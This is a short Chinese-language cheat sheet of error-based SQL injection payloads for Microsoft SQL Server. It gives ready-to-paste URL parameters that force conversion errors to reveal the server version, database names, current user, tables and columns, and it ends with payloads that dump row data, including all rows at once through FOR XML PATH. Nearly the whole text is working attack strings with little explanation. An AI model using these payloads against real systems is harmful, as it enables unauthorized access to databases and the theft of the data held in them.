[TOC] ## sqlsever报错介绍 ~~~ sqlsever在报错中不需要指定的函数，直接用闭合的方法让其报错即可 ~~~ ## sqlsever报错回显版本信息 ~~~ ?id=-1' and @@version>0 ~~~ ## sqlsever报错回显数据库 ~~~ ?id=-1' and db_name()>0 ~~~ ## sqlsever报错回显当前用户 ~~~ ?id=-1' and User_Name()>0 ~~~ ## sqlsever爆出其他数据库 ~~~ 爆出当前数据库 ?id=-1' and (select top 1 Name from master..sysdatabases)>0 id=1' and 1=convert(int,(select db_name(0)))--+ 爆出除已经知道的，第二个数据库 ?id=-1' and (select top 1 Name from master..sysdatabases where name not in('master'))>0 爆破出所有的数据库 id=1' and 1=convert(int,stuff((select quotename(name) from sys.databases for xml path('')),1,0,''))--+ ~~~ ## sqlsever爆出表名 ~~~ 爆出一行 ?id=-1' and (select top 1 Name from [数据库名称].sys.all_objects where type='U' and is_ms_shipped=0)>0 转换类型爆出一行 id=1' and 1=convert(int,(select top 1 name from 数据库名.sys.objects where type='U'))--+ 转换类型爆出所有 id=1' and 1=convert(int,stuff((select quotename(name) from 数据库名.sys.objects where type='U' for xml path('')),1,0,''))--+ ~~~ ## sqlsever爆出列名 ~~~ 转换类型爆出一行 id=1' and 1=convert(int,(select top 1 name from 数据库名.sys.columns where object_id=object_id('表名')))--+ 转换类型爆出全部 id=1' and 1=convert(int,stuff((select quotename(name) from test.sys.columns where object_id=object_id('表名') for xml path('')),1,0,''))--+ ~~~ ## sqlsever爆出数据 ~~~ 转类型爆出一行 id=1' and 1=convert(int,(select top 1 列名 from 表名))--+ 转类型爆出全部 id=1' and 1=convert(int,stuff((select quotename(列名) from 表名 for xml path('')),1,0,''))--+ ~~~